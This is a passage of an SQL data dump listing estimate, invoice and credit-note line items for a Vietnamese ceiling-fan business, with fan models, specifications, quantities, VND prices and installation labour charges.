(122, 13, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 2.00, 400000.00, '', 2, 0, NULL, 0.00),
(123, 14, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', 'MODEL NO.: 60YFT-808<br />\r\n- Fan size: 60inch ~ 1520mm, 5 blades solid Wood<br />\r\n- DC motor spec: DC Motor with BLDC, 38W<br />\r\n- Speed: 390 RPM<br />\r\n- Material blades: Wood, 5 blades<br />\r\n- Control: Remote control DC 6 speed included<br />\r\n- Power Input: 220V-240V/50Hz<br />\r\n- Motor Color: Nicken<br />\r\n- Blades Color: Light Wood<br />\r\n- Thương hiệu/Xuất xứ: Tổ chức đào tạo WIT/China', 2.00, 5440000.00, '', 1, 0, NULL, 0.00),
(124, 14, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 2.00, 400000.00, '', 2, 0, NULL, 0.00),
(126, 15, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'MODEL NO.: DCF-FS52930<br />\r\n- Fan size: 60inch ~ 1520mm, 3 blades solid Wood<br />\r\n- DC motor spec: DC Motor with BLDC, 38W<br />\r\n- Speed: 230 RPM<br />\r\n- Material blades: Wood, 3 blades<br />\r\n- Control: Remote control DC 5 speed included<br />\r\n- Power Input: 220V-240V/50Hz<br />\r\n- Finished Color: Matte Black<br />\r\n- Color: Dark Walnut<br />\r\n- Thương hiệu/Xuất xứ: Tổ chức đào tạo WIT/China', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(127, 16, 'estimate', 'Quạt trần thấp AROMA 52 BN Maple Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(128, 44, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(129, 45, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK', '', 1.00, 5800000.00, '', 1, 0, NULL, 0.00),
(130, 46, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 4500000.00, '', 1, 0, NULL, 0.00),
(131, 47, 'invoice', 'Quạt trần SINO LED 52 Black Dark Wood', '', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(132, 48, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 2.00, 6800000.00, '', 1, 0, NULL, 0.00),
(133, 49, 'invoice', 'Quạt trần SINO LED 52 Black Dark Wood', '', 1.00, 5200000.00, '', 1, 0, NULL, 0.00),
(134, 49, 'invoice', 'Nhân công lắp đặt trần bê tông', 'Miễn Phí', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(135, 8, 'credit_note', 'Quạt trần Hamachi LED 5 cánh nhựa màu Vân Gỗ KOA.', '', 1.00, 3000000.00, '', 1, 0, NULL, 0.00),
(136, 50, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(137, 51, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 3.00, 5200000.00, '', 1, 0, NULL, 0.00),
(138, 51, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 WHITE', '', 1.00, 4600000.00, '', 2, 0, NULL, 0.00),
(139, 51, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Miễn phí', 4.00, 0.00, '', 3, 0, NULL, 0.00),
(140, 17, 'estimate', 'Quạt trần cánh lớn NEVIS màu Vân Gỗ Alumium 93YFT7046', 'Sải cánh: 231 cm <br />\r\nĐông cơ tiêu chuẩn BLDC, công suất 100W <br />\r\nBộ điều khiển từ xa DC 6 tốc độ <br />\r\nMàu sắc: Vân gỗ Aluminium', 1.00, 19100000.00, '', 1, 0, NULL, 0.00),
(141, 17, 'estimate', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(142, 52, 'invoice', 'Quạt trần cánh lớn NEVIS màu Vân Gỗ Alumium 93YFT7046', 'Sải cánh: 231 cm <br />\r\nĐông cơ tiêu chuẩn BLDC, công suất 100W <br />\r\nBộ điều khiển từ xa DC 6 tốc độ <br />\r\nMàu sắc: Vân gỗ Aluminium', 1.00, 19100000.00, '', 1, 0, NULL, 0.00),
(143, 52, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(144, 18, 'estimate', 'Quạt trần phòng khách SANDY 66 KOA ABS', '', 1.00, 9000000.00, '', 1, 0, NULL, 0.00),
(145, 18, 'estimate', 'Nhân công lắp đặt trần bê tông', '', 1.00, 300000.00, '', 2, 0, NULL, 0.00),
(146, 53, 'invoice', 'Quạt trần phòng khách SANDY 66 KOA ABS', '', 1.00, 9000000.00, '', 1, 0, NULL, 0.00),
(147, 53, 'invoice', 'Nhân công lắp đặt trần bê tông', '', 1.00, 300000.00, '', 2, 0, NULL, 0.00),
(148, 19, 'estimate', 'Quạt trần cánh lớn NEVIS màu Vân Gỗ Alumium 93YFT7046', 'Sải cánh: 231 cm <br />\r\nĐông cơ tiêu chuẩn BLDC, công suất 100W <br />\r\nBộ điều khiển từ xa DC 6 tốc độ <br />\r\nMàu sắc: Vân gỗ Aluminium', 1.00, 19000000.00, '', 1, 0, NULL, 0.00),
(149, 19, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(150, 20, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Sải cánh 152cm<br />\r\nMàu cánh: Maple Wood<br />\r\nĐộng cơ BLDC, 38W<br />\r\nBộ điều khiển từ xa tặng kèm', 1.00, 8600000.00, '', 1, 0, NULL, 0.00),
(151, 20, 'estimate', 'Nhân công lắp đặt trần bê tông', 'Lắp đặt trần bê tông Miễn Phí, <br />\r\nTrần tấm thạch cao, gia cố công lắp +350k', 1.00, 350000.00, '', 2, 0, NULL, 0.00),
(152, 54, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Sải cánh 152cm<br />\r\nMàu cánh: Maple Wood<br />\r\nĐộng cơ BLDC, 38W<br />\r\nBộ điều khiển từ xa tặng kèm', 1.00, 8600000.00, '', 1, 0, NULL, 0.00),
(153, 54, 'invoice', 'Nhân công lắp đặt trần bê tông', 'Lắp đặt trần bê tông Miễn Phí, <br />\r\nTrần tấm thạch cao, gia cố công lắp +350k', 1.00, 350000.00, '', 2, 0, NULL, 0.00),
(154, 9, 'credit_note', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường... <br />\r\nCông việc: <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 3.00, 550000.00, 'cái', 1, 0, NULL, 0.00),
(155, 55, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Model: DCF-SW60605<br />\r\nSố Cánh Quạt: 3 cánh<br />\r\nNguồn Điện: 220V/50-60Hz<br />\r\nĐiều Khiển:  DC 5 cấp độ kèm theo<br />\r\nCông Suất Động Cơ: 35W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC).<br />\r\nHiệu suất gió mát và êm Cấp Độ Gió 5 cấp độ gió.<br />\r\nĐiều khiển DC sử dụng quay đổi chiều trực tiếp trên điều khiển<br />\r\nĐộng Cơ: motor DC (Brushless DC™)<br />\r\nSải Cánh (Đường Kính) 142cm/56inch<br />\r\nThương Hiệu: Tổ chức đào tạo WIT™', 2.00, 4875000.00, '', 1, 0, NULL, 0.00),
(156, 55, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 2.00, 400000.00, '', 2, 0, NULL, 0.00),
(157, 56, 'invoice', 'Quạt trần cánh lớn NEVIS màu Vân Gỗ Alumium 93YFT7046', 'Sải cánh: 231 cm <br />\r\nĐông cơ tiêu chuẩn BLDC, công suất 100W <br />\r\nBộ điều khiển từ xa DC 6 tốc độ <br />\r\nMàu sắc: Vân gỗ Aluminium', 1.00, 19000000.00, '', 1, 0, NULL, 0.00),
(158, 56, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(159, 5, 'estimate', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 500000.00, '1', 2, 0, NULL, 0.00),
(160, 21, 'estimate', 'Quạt trần ABACUS 5 cánh gỗ tự nhiên', '', 90.00, 4550000.00, '', 1, 0, NULL, 0.00),
(162, 21, 'estimate', 'Chi phí vận chuyển hàng không (ship by Air) từ USA tới chân công trình', '', 1.00, 3500000.00, 'lots', 2, 0, NULL, 0.00),
(163, 57, 'invoice', 'Quạt trần ABACUS 5 cánh gỗ tự nhiên', '', 90.00, 4550000.00, '', 1, 0, NULL, 0.00),
(164, 57, 'invoice', 'Chi phí vận chuyển hàng không (ship by Air) từ USA tới chân công trình', '', 1.00, 3500000.00, 'lots', 2, 0, NULL, 0.00),
(168, 58, 'invoice', 'Quạt trần cao cấp IRIS 60 White ABS', '', 3.00, 18300000.00, '', 1, 0, NULL, 0.00),
(169, 23, 'estimate', 'Haiku L 44 inch Black', 'Quạt trần Haiku 44 inch<br />\r\nSải cánh : 112cm<br />\r\nĐộng cơ EC hiệu suất cao<br />\r\nBộ đèn LED dimmable đi lèm<br />\r\nBộ điều khiển từ xa 7 tốc độ đi kèm<br />\r\nMàu sắc: Đen', 1.00, 15000000.00, '', 1, 0, NULL, 0.00),
(170, 23, 'estimate', 'Nhân công lắp đặt trần bê tông', 'Lắp đặt miễn phí - bao gồm theo quạt', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(171, 59, 'invoice', 'Haiku L 44 inch Black', 'Quạt trần Haiku 44 inch<br />\r\nSải cánh : 112cm<br />\r\nĐộng cơ EC hiệu suất cao<br />\r\nBộ đèn LED dimmable đi lèm<br />\r\nBộ điều khiển từ xa 7 tốc độ đi kèm<br />\r\nMàu sắc: Đen<br />\r\nThương hiệu: Haiku/xuất xứ USA', 1.00, 15000000.00, '', 1, 0, NULL, 0.00),
(172, 59, 'invoice', 'Nhân công lắp đặt trần bê tông', 'Lắp đặt miễn phí - bao gồm theo quạt', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(173, 24, 'estimate', 'Quạt trần SINO LED 52 Brush Nickel Maple Wood', '', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(174, 24, 'estimate', 'Nhân công lắp đặt', 'Trần bê tông Miễn Phí<br />\r\nTrần tấm thạch cao phí gia cố 400k/bộ quạt', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(175, 22, 'estimate', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', '', 6.00, 42330000.00, '', 1, 0, NULL, 0.00),
(176, 22, 'estimate', 'Quạt trần cao cấp IRIS 60 White ABS', '', 5.00, 18300000.00, '', 2, 0, NULL, 0.00),
(177, 60, 'invoice', 'Quạt trần SINO LED 52 Brush Nickel Maple Wood', '', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(178, 60, 'invoice', 'Nhân công lắp đặt trần tấm thạch cao', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(179, 25, 'estimate', 'Quạt trần thấp AROMA 52 LED Dark Walnut', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(180, 26, 'estimate', 'Quạt trần SINO LED 52 Brush Nickel Maple Wood', '', 1.00, 6600000.00, '', 1, 0, NULL, 0.00),
(181, 61, 'invoice', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', '', 1.00, 850000.00, '', 1, 0, NULL, 0.00),
(182, 27, 'estimate', 'Quạt trần cánh lớn NEVIS màu Vân Gỗ Alumium 93YFT7046', 'Sải cánh: 231 cm <br />\r\nĐông cơ tiêu chuẩn BLDC, công suất 100W <br />\r\nBộ điều khiển từ xa DC 6 tốc độ <br />\r\nMàu sắc: Vân gỗ Aluminium', 1.00, 14531000.00, '', 1, 0, NULL, 0.00),
(183, 27, 'estimate', 'Chi phí vận chuyển hàng hóa', '', 1.00, 350000.00, 'lots', 2, 0, NULL, 0.00),
(184, 28, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 3.00, 6800000.00, '', 1, 0, NULL, 0.00),
(185, 62, 'invoice', 'Quạt trần SINO LED 52 Brush Nickel Maple Wood', '', 1.00, 6600000.00, '', 1, 0, NULL, 0.00),
(186, 63, 'invoice', 'Bộ điều khiển ADABTER', '', 1.00, 550000.00, '', 1, 0, NULL, 0.00),
(187, 64, 'invoice', 'Nhân công lắp đặt trần thạch cao', '', 1.00, 400000.00, '', 1, 0, NULL, 0.00),
(188, 65, 'invoice', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 300000.00, '1', 1, 0, NULL, 0.00),
(189, 29, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 Black', '', 2.00, 5660000.00, '', 1, 0, NULL, 0.00),
(190, 30, 'estimate', 'Quạt trần thấp AROMA 52 BN Dark Wood', '', 1.00, 6600000.00, '', 1, 0, NULL, 0.00),
(191, 30, 'estimate', 'Nhân công lắp đặt trần thạch cao', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(192, 66, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Black', '', 2.00, 5720000.00, '', 1, 0, NULL, 0.00),
(193, 67, 'invoice', 'Quạt trần thấp AROMA 52 BN Dark Wood', '', 1.00, 6600000.00, '', 1, 0, NULL, 0.00),
(194, 67, 'invoice', 'Nhân công lắp đặt trần thạch cao', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(195, 68, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(196, 68, 'invoice', 'Nhân công lắp đặt trần thạch cao', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(197, 31, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', '', 2.00, 5720000.00, '', 1, 0, NULL, 0.00),
(198, 32, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', '', 2.00, 5720000.00, '', 1, 0, NULL, 0.00),
(199, 33, 'estimate', 'Haiku L 44 inch White', '', 1.00, 15725000.00, '', 1, 0, NULL, 0.00),
(200, 69, 'invoice', 'Haiku L 44 inch White', '', 1.00, 15725000.00, '', 1, 0, NULL, 0.00),
(201, 70, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK', '', 1.00, 5800000.00, '', 1, 0, NULL, 0.00),
(202, 34, 'estimate', 'Quạt trần thông minh cánh lớn i6 sải cánh 60 inch', '', 4.00, 98000000.00, '', 1, 0, NULL, 0.00),
(203, 71, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK', '', 1.00, 6800000.00, '', 1, 0, NULL, 0.00),
(204, 71, 'invoice', 'Nhân công lắp đặt trần tam thach cao', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(205, 35, 'estimate', 'Quạt trần SAONA SLIVER 52YFT-7062S', '', 1.00, 5800000.00, '', 1, 0, NULL, 0.00),
(206, 35, 'estimate', 'Nhân công lắp đặt trần thạch cao gia cố móc treo', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(207, 72, 'invoice', 'Quạt trần SAONA SLIVER 52YFT-7062S', '', 1.00, 5800000.00, '', 1, 0, NULL, 0.00),
(208, 72, 'invoice', 'Nhân công lắp đặt trần thạch cao gia cố móc treo', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(209, 36, 'estimate', 'Haiku L 44 inch White', 'Haiku L 44 inch White<br />\r\nSải cánh: 112cm<br />\r\nĐộng cơ EC, công suất 36W<br />\r\nĐèn LED đi kèm dimmable, ánh sáng vàng  3000K<br />\r\nĐiều khiển từ xa tặng kèm', 1.00, 13636364.00, '', 1, 0, NULL, 0.00),
(210, 73, 'invoice', 'Haiku L 44 inch White', 'Haiku L 44 inch White<br />\r\nSải cánh: 112cm<br />\r\nĐộng cơ EC, công suất 36W<br />\r\nĐèn LED đi kèm dimmable, ánh sáng vàng  3000K<br />\r\nĐiều khiển từ xa tặng kèm', 1.00, 13636364.00, '', 1, 0, NULL, 0.00),
(211, 37, 'estimate', 'Quạt trần SINO LED 52 Brush Nickel Maple Wood', '', 1.00, 6600000.00, '', 1, 0, NULL, 0.00),
(212, 74, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', '', 1.00, 5720000.00, '', 1, 0, NULL, 0.00),
(213, 75, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 1.00, 6800000.00, '', 1, 0, NULL, 0.00),
(214, 38, 'estimate', 'Quạt trần cánh lớn Essence 3m', 'Size (ft): 10 ~ 3000mm<br />\r\nVoltage/Phase: 200-240V/1<br />\r\nStandard Weight: 81 lbs<br />\r\nMax RPM: 107 RPM <br />\r\nMax Airflow: 42675 CFM<br />\r\nSupply Circuit Size:  10 A<br />\r\nFull Load Amperage: 3.4 A<br />\r\nMax Sound Level: &lt;35 dBA', 1.00, 136363637.00, '', 1, 0, NULL, 0.00),
(215, 76, 'invoice', 'Quạt trần cánh lớn Essence 3m', 'Size (ft): 10 ~ 3000mm<br />\r\nVoltage/Phase: 200-240V/1<br />\r\nStandard Weight: 81 lbs<br />\r\nMax RPM: 107 RPM <br />\r\nMax Airflow: 42675 CFM<br />\r\nSupply Circuit Size:  10 A<br />\r\nFull Load Amperage: 3.4 A<br />\r\nMax Sound Level: &lt;35 dBA', 1.00, 136363637.00, '', 1, 0, NULL, 0.00),
(220, 77, 'invoice', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 2.00, 300000.00, '1', 1, 0, NULL, 0.00),
(222, 78, 'invoice', 'Quạt trần thấp AROMA 52 BN Dark Wood', '', 1.00, 6600000.00, '', 1, 0, NULL, 0.00),
(223, 78, 'invoice', 'Nhân công lắp đặt trần thạch cao', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(224, 79, 'invoice', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', '', 1.00, 850000.00, '', 1, 0, NULL, 0.00),
(225, 39, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 1.00, 850000.00, '', 1, 0, NULL, 0.00),
(226, 40, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 1.00, 850000.00, '', 1, 0, NULL, 0.00),
(227, 80, 'invoice', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', '', 1.00, 850000.00, '', 1, 0, NULL, 0.00),
(228, 41, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 9.00, 6800000.00, '', 1, 0, NULL, 0.00),
(229, 42, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 142cm<br />\r\nĐộng cơ DC, BLDC, công suất 35W<br />\r\nĐiều khiển từ xa tặng kèm<br />\r\nMàu cánh: Dark Walnut<br />\r\nMàu thân quạt: Đen', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(230, 42, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Phí gia cố làm móc treo trần thạch cao', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(231, 81, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 142cm<br />\r\nĐộng cơ DC, BLDC, công suất 35W<br />\r\nĐiều khiển từ xa tặng kèm<br />\r\nMàu cánh: Dark Walnut<br />\r\nMàu thân quạt: Đen', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(232, 81, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Phí gia cố làm móc treo trần thạch cao', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(233, 43, 'estimate', 'Haiku Outdoor Cocoa Aluminum', 'Sải cánh 132cm<br />\r\nTiêu chuẩn: Outdoor (không phù hợp môi trường muối biển)<br />\r\nMàu cánh: Cocoa Woodgrain Aluminum<br />\r\nMàu Thân: Black<br />\r\nMóc treo: Universal<br />\r\nThương hiệu/Xuất xứ: Big Ass Fans/USA', 1.00, 82000000.00, '', 1, 0, NULL, 0.00),
(234, 43, 'estimate', 'Chi phí vận chuyển hàng không (ship by Air) từ USA tới chân công trình', '', 1.00, 35600000.00, 'lots', 2, 0, NULL, 0.00),
(235, 44, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 140cm<br />\r\nMàu cánh: Dark Walnut<br />\r\nMàu thân: Đen<br />\r\nCông suất động cơ: 33.6W', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(236, 44, 'estimate', 'Nhân công lắp đặt trần tấm thạch cao - gia cố móc ty treo', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(237, 82, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 140cm<br />\r\nMàu cánh: Dark Walnut<br />\r\nMàu thân: Đen<br />\r\nCông suất động cơ: 33.6W', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(238, 82, 'invoice', 'Nhân công lắp đặt trần tấm thạch cao - gia cố móc ty treo', '', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(239, 45, 'estimate', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế:', 1.00, 450000.00, '', 1, 0, NULL, 0.00),
(240, 83, 'invoice', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế:', 1.00, 450000.00, '', 1, 0, NULL, 0.00),
(241, 46, 'estimate', 'Quạt trần thấp AROMA 52 Dark Walnut', 'Sải cánh 132cm<br />\r\nĐộng cơ DC<br />\r\nCông suất 35W, <br />\r\nTặng kèm điều khiển từ xa', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(242, 46, 'estimate', 'Nhân công lắp đặt trần thạch cao', 'Miễn phí lắp đặt 01 quạt trần', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(243, 84, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', 'Sải cánh 132cm<br />\r\nĐộng cơ DC<br />\r\nCông suất 35W, <br />\r\nTặng kèm điều khiển từ xa', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(244, 84, 'invoice', 'Nhân công lắp đặt trần thạch cao', 'Miễn phí lắp đặt 01 quạt trần', 1.00, 400000.00, '', 2, 0, NULL, 0.00),
(245, 47, 'estimate', 'Quạt trần SINO LED 52 Black Dark Wood', '', 3.00, 6300000.00, '', 1, 0, NULL, 0.00),
(247, 85, 'invoice', 'Quạt trần SINO LED 52 Black Dark Wood', '', 3.00, 6300000.00, '', 1, 0, NULL, 0.00),
(249, 48, 'estimate', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', 'Sải cánh 150cm', 2.00, 0.00, '', 1, 0, NULL, 0.00),
(252, 86, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK', '', 1.00, 5800000.00, '', 1, 0, NULL, 0.00),
(253, 87, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 140cm<br />\r\nMàu cánh Dark Walnut<br />\r\nMàu thân : đen<br />\r\nCông suất động cơ : 33.6W', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(254, 49, 'estimate', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', '', 1.00, 98300000.00, '', 1, 0, NULL, 0.00),
(255, 50, 'estimate', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 500000.00, '1', 1, 0, NULL, 0.00),
(256, 88, 'invoice', 'Bộ điều khiển AC 3 tốc độ ShengQi', 'Bộ điều khiển 3 tốc độ. Dùng cho động cơ AC', 1.00, 500000.00, '1', 1, 0, NULL, 0.00),
(257, 89, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', '', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(258, 90, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', '', 2.00, 0.00, '', 1, 0, NULL, 0.00),
(259, 51, 'estimate', 'Quạt trần Mountain Air 52YFT-002', 'Sải cánh 132cm <br />\r\nChất liệu cánh gỗ ép (Plywood)  <br />\r\nĐộng cơ AC Si-steel 100% Copper <br />\r\nĐiều khiển bằng dây giật <br />\r\n', 8.00, 2950000.00, '', 1, 0, NULL, 0.00),
(260, 91, 'invoice', 'Quạt trần Mountain Air 52YFT-002', 'Sải cánh 132cm <br />\r\nChất liệu cánh gỗ ép (Plywood)  <br />\r\nĐộng cơ AC Si-steel 100% Copper <br />\r\nĐiều khiển bằng dây giật', 8.00, 2950000.00, '', 1, 0, NULL, 0.00),
(261, 92, 'invoice', 'Trường học AIS Mai Chi Thọ', 'Duyệt bảng vẽ layout thi công cáp điện và cáp điều khiển Modbus - 00:00 Giờ', 0.00, 0.00, '', 1, 0, NULL, 0.00),
(262, 92, 'invoice', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', '', 9.00, 42130000.00, '', 2, 0, NULL, 0.00),
(263, 92, 'invoice', 'Chi phí nhân công lắp đặt quạt làm mát treo trần + chi phí vật tư', '', 1.00, 90889000.00, '', 3, 0, NULL, 0.00),
(264, 52, 'estimate', 'Quạt trần SAONA SLIVER 52YFT-7062S', '', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(265, 52, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(266, 93, 'invoice', 'Quạt trần SAONA SLIVER 52YFT-7062S', '', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(267, 93, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(268, 53, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(269, 94, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(270, 54, 'estimate', 'Quạt trần thấp AROMA 52 LED Dark Walnut', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(271, 54, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao (Phí gia cố móc treo)', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(272, 55, 'estimate', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', '', 24.00, 0.00, '', 1, 0, NULL, 0.00),
(273, 56, 'estimate', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(274, 56, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, '', 2, 0, NULL, 0.00),
(275, 95, 'invoice', 'Quạt trần thấp AROMA 52 Dark Walnut', '', 2.00, 6500000.00, '', 1, 0, NULL, 0.00),
(276, 95, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 2.00, 500000.00, '', 2, 0, NULL, 0.00),
(277, 96, 'invoice', 'Quạt trần thấp AROMA 52 LED Dark Walnut', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(278, 97, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí kiểm tra, sửa chữa quạt trần', 1.00, 150000.00, 'cái', 1, 0, NULL, 0.00),
(279, 98, 'invoice', 'Quạt trần thấp AROMA 52 LED Dark Walnut', '', 1.00, 6500000.00, '', 1, 0, NULL, 0.00),
(280, 57, 'estimate', 'Quạt trần cánh lớn NEVIS màu Sliver alumium 93YFT7046', 'Sải cánh: 231 cm <br />\r\nCông suất động cơ: tiêu chuẩn BLDC, 100W <br />\r\nMàu sắc: Sliver Aluminium', 1.00, 18500000.00, '', 1, 0, NULL, 0.00),
(282, 57, 'estimate', 'Nhân công lắp đặt - quạt trần Nevis', '', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(283, 99, 'invoice', 'Quạt trần cánh lớn NEVIS màu Sliver alumium 93YFT7046', 'Sải cánh: 231 cm <br />\r\nCông suất động cơ: tiêu chuẩn BLDC, 100W <br />\r\nMàu sắc: Sliver Aluminium', 1.00, 18500000.00, '', 1, 0, NULL, 0.00),
(284, 99, 'invoice', 'Nhân công lắp đặt - quạt trần Nevis', '', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(288, 58, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí sửa chữa phát sinh', 1.00, 150000.00, 'cái', 1, 0, NULL, 0.00),
(289, 100, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí sửa chữa phát sinh', 1.00, 150000.00, 'cái', 1, 0, NULL, 0.00),
